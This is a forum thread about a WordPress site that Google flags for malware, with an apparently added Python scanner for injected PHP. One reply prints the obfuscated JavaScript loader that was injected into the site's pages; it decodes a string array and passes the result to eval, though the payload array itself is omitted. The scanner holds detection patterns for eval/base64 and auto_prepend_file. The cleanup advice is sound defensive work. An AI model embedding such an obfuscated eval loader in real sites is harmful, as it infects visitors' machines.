Discussion about smartybrighty.com
by carloflores
over 1 year ago

I downloaded all my website files and scanned them locally using my own antivirus and anti-malware program and did not find any problems.

Warning: Something’s Not Right Here!
smartybrighty.com contains malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified smartybrighty.com that we found malware on the site. For more about the problems found on smartybrighty.com, visit the Google Safe Browsing diagnostic page.

by redleg
over 1 year ago

There is a block of obfuscated script being inserted at the beginning of your pages, before the doctype declaration. This is what I am getting:

<script>v=window;try{fawbe++}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{v["document"]["body"]="123"}catch(gfdnfdgber){m=123;if((alert+"").indexOf("native")!==-1)ev=window["e"+"v"+"al"];}} n=[ /* long array of base-23 encoded string values */ ];h=2;s="";if(m)for(i=0;i-603!=0;i++){k=i;if(window["document"])s+=String["fro"+"mCharCode"](parseInt(n[i],23));}try{febwnrth--}catch(bawetawe){z=s;ev(z)}}</script>
<br /> <b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /home/smarty/public_html/index.php(1) : eval()'d code:8) in <b>/home/smarty/public_html/wp-content/plugins/gotmls/index.php</b> on line <b>13</b><br />
<br /> <b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /home/smarty/public_html/index.php(1) : eval()'d code:8) in <b>/home/smarty/public_html/wp-content/plugins/gotmls/index.php</b> on line <b>13</b><br />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

That block is malicious.

Unfortunately there are a lot of ways to do that. Check your .htaccess, check your PHP code for any obfuscated PHP code, base64 stuff, and also take a look at php.ini for anything in the auto prepend file:

; Automatically add files before PHP document.
; http://php.net/auto-prepend-file
auto_prepend_file =

anything after the =
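
The checks listed in the post above, as an added example that is not part of the original thread: it flags a non-empty `auto_prepend_file`/`auto_append_file` in php.ini, .user.ini or .htaccess, and decode-then-`eval` calls in PHP files with their line number (the PHP warning quoted above points at line 1 of index.php). The function names, sample files and paths are constructed for illustration.

```python
import re
from pathlib import Path

# php.ini / .user.ini:  auto_prepend_file = /path/file.php
INI_RE = re.compile(r'^\s*(auto_(?:prepend|append)_file)\s*=\s*"?([^";\s]+)', re.I)
# .htaccess with mod_php:  php_value auto_prepend_file /path/file.php
HTA_RE = re.compile(r'^\s*php_(?:admin_)?value\s+(auto_(?:prepend|append)_file)\s+"?([^"\s]+)', re.I)
# Decode-then-execute idiom: eval(base64_decode(...)), eval(gzinflate(base64_decode(...)))
OBF_RE = re.compile(r'\beval\s*\(\s*@?(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(', re.I)
RULES = [(".htaccess", HTA_RE), (".ini", INI_RE), (".php", OBF_RE)]

def check_text(name, text):
    """Return (file, line, kind, detail) findings for one file's contents."""
    base = Path(name).name.lower()
    rx = next((r for suffix, r in RULES if base.endswith(suffix)), None)
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        m = rx.search(line) if rx else None
        if not m:
            continue
        if rx is OBF_RE:
            hits.append((name, no, "eval", m.group(0)))
        elif m.group(2).lower() != "none":  # "none" switches the directive off
            hits.append((name, no, m.group(1).lower(), m.group(2)))
    return hits

def scan_dir(root):
    """Walk a local copy of the web root and collect findings from every file."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file():
            hits += check_text(str(p), p.read_text(errors="replace"))
    return hits

# Constructed sample files (not taken from the site in the thread)
SAMPLE = {
    "php.ini": "; Automatically add files before PHP document.\nauto_prepend_file =\n",
    ".user.ini": "auto_prepend_file = /tmp/.cache.php\n",
    ".htaccess": "RewriteEngine On\nphp_value auto_prepend_file /home/example/.x.php\n",
    "index.php": "<?php eval(base64_decode('ZWNobyAxOw==')); ?>\n<?php require 'wp-blog-header.php';\n",
    "clean.php": "<?php $img = base64_decode($stored); ?>\n",
}

if __name__ == "__main__":
    for fname, body in SAMPLE.items():
        for hit in check_text(fname, body):
            print(hit)
```

Run `scan_dir()` against a downloaded copy of the site; an empty `auto_prepend_file =` line, as in the stock php.ini excerpt above, is not reported.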

by carloflores
over 1 year ago

Thanks redleg. I found a lot of modified code in my .htaccess written by http://www.ait-pro.com/aitpro-blog/297/bulletproof-security-plugin-support/bulletproof-security-wordpress-plugin-support/
I have restored the system and removed the said plugin.

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress

by carloflores
over 1 year ago

Hello. Why do we still keep on being listed as a website distributing malware? We didn’t do anything for the past week.
